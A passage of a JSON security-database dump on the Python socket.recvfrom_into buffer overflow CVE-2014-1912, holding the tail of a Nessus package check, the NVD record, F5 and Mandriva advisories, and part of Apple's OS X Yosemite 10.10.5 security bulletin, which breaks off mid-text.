cpu:\"x86_64\", reference:\"lib64python-devel-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64python2.7-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"python-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"python-docs-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-2.7.3-4.5.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-apps-2.7.3-4.5.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Mandriva Local Security Checks", "pluginID": "72594", "cpe": ["p-cpe:/a:mandriva:linux:tkinter", "p-cpe:/a:mandriva:linux:lib64python2.7", "cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:tkinter-apps", "p-cpe:/a:mandriva:linux:python-docs", "p-cpe:/a:mandriva:linux:python", "p-cpe:/a:mandriva:linux:lib64python-devel"]}

{"cve": [{"lastseen": "2018-01-05T12:21:37", "references": ["http://rhn.redhat.com/errata/RHSA-2015-1330.html", "http://pastebin.com/raw.php?i=GHXSmNEg", "http://hg.python.org/cpython/rev/87673659d8f7", "http://www.openwall.com/lists/oss-security/2014/02/12/16", "http://www.securitytracker.com/id/1029831", "https://security.gentoo.org/glsa/201503-10", "https://www.trustedsec.com/february-2014/python-remote-code-execution-socket-recvfrom_into/", "https://support.apple.com/kb/HT205031", "http://www.debian.org/security/2014/dsa-2880", "http://www.ubuntu.com/usn/USN-2125-1", "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html", "http://bugs.python.org/issue20246", "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html", "http://lists.opensuse.org/opensuse-updates/2014-04/msg00035.html", "http://rhn.redhat.com/errata/RHSA-2015-1064.html", "http://lists.opensuse.org/opensuse-updates/2014-05/msg00008.html", "http://www.securityfocus.com/bid/65379", "http://lists.apple.com/archives/security-announce/2015/Aug/msg00001.html", "http://www.exploit-db.com/exploits/31875"], "edition": 6, "description": "Buffer overflow in the socket.recvfrom_into function in Modules/socketmodule.c in Python 2.5 before 2.7.7, 3.x before 3.3.4, and 3.4.x before 3.4rc1 allows remote attackers to execute arbitrary code via a crafted string.", "reporter": "NVD", "published": "2014-02-28T19:55:05", "title": "CVE-2014-1912", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-1912"], "scanner": [], "cpe": ["cpe:/o:apple:mac_os_x:10.10.4", "cpe:/a:python:python:2.6", "cpe:/a:python:python:2.6.3", "cpe:/a:python:python:2.6.8", "cpe:/a:python:python:3.0.1", "cpe:/a:python:python:2.5.1", "cpe:/a:python:python:2.7.2:rc1", "cpe:/a:python:python:2.7.5", "cpe:/a:python:python:2.5.6", "cpe:/a:python:python:2.7.1150", "cpe:/a:python:python:3.1.1", "cpe:/a:python:python:2.7.1150::~~~~x64~", "cpe:/a:python:python:2.7.1:rc1", "cpe:/a:python:python:2.5.2", "cpe:/a:python:python:3.2", "cpe:/a:python:python:2.7.2150", "cpe:/a:python:python:3.2.0", "cpe:/a:python:python:3.1.2", "cpe:/a:python:python:3.4:alpha1", "cpe:/a:python:python:2.7.6", "cpe:/a:python:python:2.6.5", "cpe:/a:python:python:2.7.3", "cpe:/a:python:python:3.3.3", "cpe:/a:python:python:2.6.2", "cpe:/a:python:python:3.3.0", "cpe:/a:python:python:3.1", "cpe:/a:python:python:2.6.6", "cpe:/a:python:python:2.6.7", "cpe:/a:python:python:2.5.3", "cpe:/a:python:python:2.5", "cpe:/a:python:python:2.7.4", "cpe:/a:python:python:3.0", "cpe:/a:python:python:3.2.2", "cpe:/a:python:python:3.2.1", "cpe:/a:python:python:2.6.2150", "cpe:/a:python:python:3.2.3", "cpe:/a:python:python:2.5.150", "cpe:/a:python:python:3.3.2", "cpe:/a:python:python:3.2:alpha", "cpe:/a:python:python:3.3", "cpe:/a:python:python:2.7.1", "cpe:/a:python:python:3.1.3", "cpe:/a:python:python:3.1.5", "cpe:/a:python:python:2.6.4", "cpe:/a:python:python:3.2.4", "cpe:/a:python:python:3.3:beta2", "cpe:/a:python:python:3.1.2150::~~~~x64~", "cpe:/a:python:python:2.6.1", "cpe:/a:python:python:2.7", "cpe:/a:python:python:3.1.4", "cpe:/a:python:python:3.2.5", "cpe:/a:python:python:2.5.4", "cpe:/a:python:python:3.2.2150", "cpe:/a:python:python:3.3.1", "cpe:/a:python:python:2.6.6150"], "modified": "2018-01-04T21:29:49", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1912", "id": "CVE-2014-1912", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "f5": [{"lastseen": "2017-07-22T00:24:48", "references": [], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.2.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.2.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "reporter": "f5", "published": "2017-07-21T22:49:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Python and Jython vulnerabilities CVE-2014-1912 and CVE-2014-4650", "type": "f5", "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-1912", "CVE-2014-4650"], "modified": "2017-07-21T22:49:00", "href": "https://support.f5.com/csp/article/K93278412", "id": "F5:K93278412", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:50", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:041\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : python\r\n Date : February 19, 2014\r\n Affected: Business Server 1.0, Enterprise Server 5.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n A vulnerability was reported in Python&#039;s socket module, due to a\r\n boundary error within the sock_recvfrom_into&#40;&#41; function, which could\r\n be exploited to cause a buffer overflow. This could be used to crash a\r\n Python application that uses the socket.recvfrom_info&#40;&#41; function or,\r\n possibly, execute arbitrary code with the permissions of the user\r\n running vulnerable Python code &#40;CVE-2014-1912&#41;.\r\n \r\n The updated packages have been patched to correct this issue.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1912\r\n http://bugs.python.org/issue20246\r\n https://bugzilla.redhat.com/show_bug.cgi?id=1062370\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Enterprise Server 5:\r\n 9f5d8acdfaff42d2fe7aae145aa6bdf4 mes5/i586/libpython2.5-2.5.2-5.13mdvmes5.2.i586.rpm\r\n 87e946a35ed4a041ce15fb328a94962f mes5/i586/libpython2.5-devel-2.5.2-5.13mdvmes5.2.i586.rpm\r\n 8e89735ab8baa2f6975f8238b082c059 mes5/i586/python-2.5.2-5.13mdvmes5.2.i586.rpm\r\n 903a0bd59758cf89d2cfc6f50dfccf31 mes5/i586/python-base-2.5.2-5.13mdvmes5.2.i586.rpm\r\n 12299e01e8a6854b9b737e7134e0c67e mes5/i586/python-docs-2.5.2-5.13mdvmes5.2.i586.rpm\r\n 6981e8ff73aea76e7781c9f4eaa16221 mes5/i586/tkinter-2.5.2-5.13mdvmes5.2.i586.rpm\r\n b48267baca317515f87ba162ed4eab02 mes5/i586/tkinter-apps-2.5.2-5.13mdvmes5.2.i586.rpm \r\n 83a624a38fbf33f8dd30be16c059fedd mes5/SRPMS/python-2.5.2-5.13mdvmes5.2.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n d29187d3073068ca4dd23a7e873ad23f mes5/x86_64/lib64python2.5-2.5.2-5.13mdvmes5.2.x86_64.rpm\r\n 6a982f71c8363e6bce7f8958168702bd mes5/x86_64/lib64python2.5-devel-2.5.2-5.13mdvmes5.2.x86_64.rpm\r\n 75bc4436ed423dcedaf209d774bcbfab mes5/x86_64/python-2.5.2-5.13mdvmes5.2.x86_64.rpm\r\n 33a74fac35c5009fcc066d774f4b200d mes5/x86_64/python-base-2.5.2-5.13mdvmes5.2.x86_64.rpm\r\n 945d27beff9becc2b207027edd6b90e1 mes5/x86_64/python-docs-2.5.2-5.13mdvmes5.2.x86_64.rpm\r\n 9163259f05462f665998c2add88f8631 mes5/x86_64/tkinter-2.5.2-5.13mdvmes5.2.x86_64.rpm\r\n 63d61503b92a17c04548db2b60faa395 mes5/x86_64/tkinter-apps-2.5.2-5.13mdvmes5.2.x86_64.rpm \r\n 83a624a38fbf33f8dd30be16c059fedd mes5/SRPMS/python-2.5.2-5.13mdvmes5.2.src.rpm\r\n\r\n Mandriva Business Server 1/X86_64:\r\n 949fbdcadfe90fd12d6c6dcc2d1740ef mbs1/x86_64/lib64python2.7-2.7.3-4.5.mbs1.x86_64.rpm\r\n 750b20f80e21a7b2a753b736fb3bbb9b mbs1/x86_64/lib64python-devel-2.7.3-4.5.mbs1.x86_64.rpm\r\n 9264c30b67dd6fa5438b73ecc9e218aa mbs1/x86_64/python-2.7.3-4.5.mbs1.x86_64.rpm\r\n e3245ecc8907e9ae9e8dc70e23d057c6 mbs1/x86_64/python-docs-2.7.3-4.5.mbs1.noarch.rpm\r\n b2fa904583d40bca084cc24c1599cc47 mbs1/x86_64/tkinter-2.7.3-4.5.mbs1.x86_64.rpm\r\n f115c68c0713f3681d411d635c910374 mbs1/x86_64/tkinter-apps-2.7.3-4.5.mbs1.x86_64.rpm \r\n ad12c7fe3e8f82dd0e4836288af1198a mbs1/SRPMS/python-2.7.3-4.5.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFTBF1JmqjQ0CJFipgRAhDEAJ9tmnwSQ16RCBiNjXc7qge0Q/oXnQCgmsKL\r\n7otvc41VTF+HbIhMxfFud6Y=\r\n=PIy4\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-03-03T00:00:00", "title": "[ MDVSA-2014:041 ] python", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:50", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-1912"], "modified": "2014-03-03T00:00:00", "id": "SECURITYVULNS:DOC:30347", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30347", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:54", "references": ["https://vulners.com/securityvulns/securityvulns:doc:30347"], "description": "socket.recvfrom_info&#40;&#41; buffer overflow", "edition": 1, "reporter": "BUGTRAQ", "published": "2014-03-03T00:00:00", "title": "Python buffer overflow", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:54", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "python", "version": "3.4", "operator": "eq"}], "cvelist": ["CVE-2014-1912"], "modified": "2014-03-03T00:00:00", "id": "SECURITYVULNS:VULN:13594", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13594", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:01", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32391", "https://vulners.com/securityvulns/securityvulns:doc:32390"], "description": "Over 150 different vulnerabilities in system components and libraries.", "edition": 1, "reporter": "BUGTRAQ", "published": "2015-08-17T00:00:00", "title": "Apple Mac OS X / OS X Server multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:01", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "MacOS X", "version": "10.10", "operator": "eq"}, {"name": "MacOS X Server", "version": "4.1", "operator": "eq"}], "cvelist": ["CVE-2015-5768", "CVE-2015-5600", "CVE-2015-2787", "CVE-2015-5779", "CVE-2013-1775", "CVE-2015-3185", "CVE-2015-3786", "CVE-2015-1792", "CVE-2015-3761", "CVE-2014-7844", "CVE-2015-3781", "CVE-2015-3776", "CVE-2015-2783", "CVE-2015-5748", "CVE-2014-1912", "CVE-2015-5477", "CVE-2015-3802", "CVE-2015-3797", "CVE-2014-0191", "CVE-2015-3762", "CVE-2015-3329", "CVE-2009-5078", "CVE-2015-5754", "CVE-2015-3783", "CVE-2015-3330", "CVE-2014-3613", "CVE-2015-1789", "CVE-2015-3789", "CVE-2014-8150", "CVE-2014-3583", "CVE-2015-3779", "CVE-2015-3788", "CVE-2015-3778", "CVE-2015-0241", "CVE-2013-1776", "CVE-2015-5776", "CVE-2015-3766", "CVE-2015-3775", "CVE-2013-7338", "CVE-2015-3798", "CVE-2015-5777", "CVE-2015-3765", "CVE-2015-3782", "CVE-2015-0242", "CVE-2015-0253", "CVE-2015-3784", "CVE-2015-3787", "CVE-2015-3799", "CVE-2015-3153", "CVE-2015-3768", "CVE-2015-3760", "CVE-2015-4148", "CVE-2015-5781", "CVE-2015-3805", "CVE-2015-3790", "CVE-2015-5774", "CVE-2015-3792", "CVE-2015-3803", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-5784", "CVE-2015-5751", "CVE-2015-4024", "CVE-2015-3795", "CVE-2015-5750", "CVE-2015-5747", "CVE-2015-4021", "CVE-2015-3144", "CVE-2014-7185", "CVE-2015-5761", "CVE-2013-2777", "CVE-2015-3794", "CVE-2015-5773", "CVE-2015-3769", "CVE-2014-3707", "CVE-2015-3800", "CVE-2015-0228", "CVE-2015-3807", "CVE-2015-0244", "CVE-2015-4026", "CVE-2014-8769", "CVE-2015-5756", "CVE-2014-3660", "CVE-2015-1788", "CVE-2015-4147", "CVE-2014-8161", "CVE-2012-6685", "CVE-2015-5753", "CVE-2015-3183", "CVE-2015-3772", "CVE-2014-3620", "CVE-2014-9140", "CVE-2013-2776", "CVE-2015-4022", "CVE-2015-3770", "CVE-2015-3777", "CVE-2015-5771", "CVE-2015-5775", "CVE-2015-3780", "CVE-2013-7422", "CVE-2015-5755", "CVE-2015-3145", "CVE-2015-1790", "CVE-2015-5758", "CVE-2014-0106", "CVE-2015-0243", "CVE-2015-3804", "CVE-2015-3773", "CVE-2014-3581", "CVE-2015-3774", "CVE-2015-5782", "CVE-2014-8109", "CVE-2015-5778", "CVE-2013-7040", "CVE-2015-3757", "CVE-2015-3764", "CVE-2015-3143", "CVE-2014-0067", "CVE-2015-5772", "CVE-2015-3791", "CVE-2014-9365", "CVE-2014-8151", "CVE-2015-5757", "CVE-2015-3796", "CVE-2009-5044", "CVE-2015-5783", "CVE-2014-9680", "CVE-2015-5763", "CVE-2014-8767", "CVE-2015-3767", "CVE-2015-3806", "CVE-2015-1791", "CVE-2015-3771", "CVE-2015-3148"], "modified": "2015-08-17T00:00:00", "id": "SECURITYVULNS:VULN:14630", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14630", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:00", "references": [], "description": "\r\n\r\nAPPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update\r\n2015-006\r\n\r\nOS X Yosemite v10.10.5 and Security Update 2015-006 is now available\r\nand addresses the following:\r\n\r\napache\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in Apache 2.4.16, the most\r\nserious of which may allow a remote attacker to cause a denial of\r\nservice.\r\nDescription: Multiple vulnerabilities existed in Apache versions\r\nprior to 2.4.16. These were addressed by updating Apache to version\r\n2.4.16.\r\nCVE-ID\r\nCVE-2014-3581\r\nCVE-2014-3583\r\nCVE-2014-8109\r\nCVE-2015-0228\r\nCVE-2015-0253\r\nCVE-2015-3183\r\nCVE-2015-3185\r\n\r\napache_mod_php\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in PHP 5.5.20, the most\r\nserious of which may lead to arbitrary code execution.\r\nDescription: Multiple vulnerabilities existed in PHP versions prior\r\nto 5.5.20. These were addressed by updating Apache to version 5.5.27.\r\nCVE-ID\r\nCVE-2015-2783\r\nCVE-2015-2787\r\nCVE-2015-3307\r\nCVE-2015-3329\r\nCVE-2015-3330\r\nCVE-2015-4021\r\nCVE-2015-4022\r\nCVE-2015-4024\r\nCVE-2015-4025\r\nCVE-2015-4026\r\nCVE-2015-4147\r\nCVE-2015-4148\r\n\r\nApple ID OD Plug-in\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able change the password of a\r\nlocal user\r\nDescription: In some circumstances, a state management issue existed\r\nin password authentication. The issue was addressed through improved\r\nstate management.\r\nCVE-ID\r\nCVE-2015-3799 : an anonymous researcher working with HP&#39;s Zero Day\r\nInitiative\r\n\r\nAppleGraphicsControl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: An issue existed in AppleGraphicsControl which could\r\nhave led to the disclosure of kernel memory layout. This issue was\r\naddressed through improved bounds checking.\r\nCVE-ID\r\nCVE-2015-5768 : JieTao Yang of KeenTeam\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in\r\nIOBluetoothHCIController. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3779 : Teddy Reed of Facebook Security\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: A memory management issue could have led to the\r\ndisclosure of kernel memory layout. This issue was addressed with\r\nimproved memory management.\r\nCVE-ID\r\nCVE-2015-3780 : Roberto Paleari and Aristide Fattori of Emaze\r\nNetworks\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious app may be able to access notifications from\r\nother iCloud devices\r\nDescription: An issue existed where a malicious app could access a\r\nBluetooth-paired Mac or iOS device&#39;s Notification Center\r\nnotifications via the Apple Notification Center Service. The issue\r\naffected devices using Handoff and logged into the same iCloud\r\naccount. This issue was resolved by revoking access to the Apple\r\nNotification Center Service.\r\nCVE-ID\r\nCVE-2015-3786 : Xiaolong Bai &#40;Tsinghua University&#41;, System Security\r\nLab &#40;Indiana University&#41;, Tongxin Li &#40;Peking University&#41;, XiaoFeng\r\nWang &#40;Indiana University&#41;\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker with privileged network position may be able to\r\nperform denial of service attack using malformed Bluetooth packets\r\nDescription: An input validation issue existed in parsing of\r\nBluetooth ACL packets. This issue was addressed through improved\r\ninput validation.\r\nCVE-ID\r\nCVE-2015-3787 : Trend Micro\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local attacker may be able to cause unexpected application\r\ntermination or arbitrary code execution\r\nDescription: Multiple buffer overflow issues existed in blued&#39;s\r\nhandling of XPC messages. These issues were addressed through\r\nimproved bounds checking.\r\nCVE-ID\r\nCVE-2015-3777 : mitp0sh of [PDX]\r\n\r\nbootp\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious Wi-Fi network may be able to determine networks\r\na device has previously accessed\r\nDescription: Upon connecting to a Wi-Fi network, iOS may have\r\nbroadcast MAC addresses of previously accessed networks via the DNAv4\r\nprotocol. This issue was addressed through disabling DNAv4 on\r\nunencrypted Wi-Fi networks.\r\nCVE-ID\r\nCVE-2015-3778 : Piers O&#39;Hanlon of Oxford Internet Institute,\r\nUniversity of Oxford &#40;on the EPSRC Being There project&#41;\r\n\r\nCloudKit\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to access the iCloud\r\nuser record of a previously signed in user\r\nDescription: A state inconsistency existed in CloudKit when signing\r\nout users. This issue was addressed through improved state handling.\r\nCVE-ID\r\nCVE-2015-3782 : Deepkanwal Plaha of University of Toronto\r\n\r\nCoreMedia Playback\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in CoreMedia Playback.\r\nThese were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5777 : Apple\r\nCVE-2015-5778 : Apple\r\n\r\nCoreText\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5761 : John Villamil &#40;@day6reak&#41;, Yahoo Pentest Team\r\n\r\nCoreText\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5755 : John Villamil &#40;@day6reak&#41;, Yahoo Pentest Team\r\n\r\ncurl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities in cURL and libcurl prior to\r\n7.38.0, one of which may allow remote attackers to bypass the Same\r\nOrigin Policy.\r\nDescription: Multiple vulnerabilities existed in cURL and libcurl\r\nprior to 7.38.0. These issues were addressed by updating cURL to\r\nversion 7.43.0.\r\nCVE-ID\r\nCVE-2014-3613\r\nCVE-2014-3620\r\nCVE-2014-3707\r\nCVE-2014-8150\r\nCVE-2014-8151\r\nCVE-2015-3143\r\nCVE-2015-3144\r\nCVE-2015-3145\r\nCVE-2015-3148\r\nCVE-2015-3153\r\n\r\nData Detectors Engine\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a sequence of unicode characters can lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in processing of\r\nUnicode characters. These issues were addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-5750 : M1x7e1 of Safeye Team &#40;www.safeye.org&#41;\r\n\r\nDate &amp; Time pref pane\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Applications that rely on system time may have unexpected\r\nbehavior\r\nDescription: An authorization issue existed when modifying the\r\nsystem date and time preferences. This issue was addressed with\r\nadditional authorization checks.\r\nCVE-ID\r\nCVE-2015-3757 : Mark S C Smith\r\n\r\nDictionary Application\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker with a privileged network position may be able\r\nto intercept users&#39; Dictionary app queries\r\nDescription: An issue existed in the Dictionary app, which did not\r\nproperly secure user communications. This issue was addressed by\r\nmoving Dictionary queries to HTTPS.\r\nCVE-ID\r\nCVE-2015-3774 : Jeffrey Paul of EEQJ, Jan Bee of the Google Security\r\nTeam\r\n\r\nDiskImages\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted DMG file may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in parsing of\r\nmalformed DMG images. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3800 : Frank Graziano of the Yahoo Pentest Team\r\n\r\ndyld\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A path validation issue existed in dyld. This was\r\naddressed through improved environment sanitization.\r\nCVE-ID\r\nCVE-2015-3760 : beist of grayhash, Stefan Esser\r\n\r\nFontParser\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-3804 : Apple\r\nCVE-2015-5775 : Apple\r\n\r\nFontParser\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5756 : John Villamil &#40;@day6reak&#41;, Yahoo Pentest Team\r\n\r\ngroff\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple issues in pdfroff\r\nDescription: Multiple issues existed in pdfroff, the most serious of\r\nwhich may allow arbitrary filesystem modification. These issues were\r\naddressed by removing 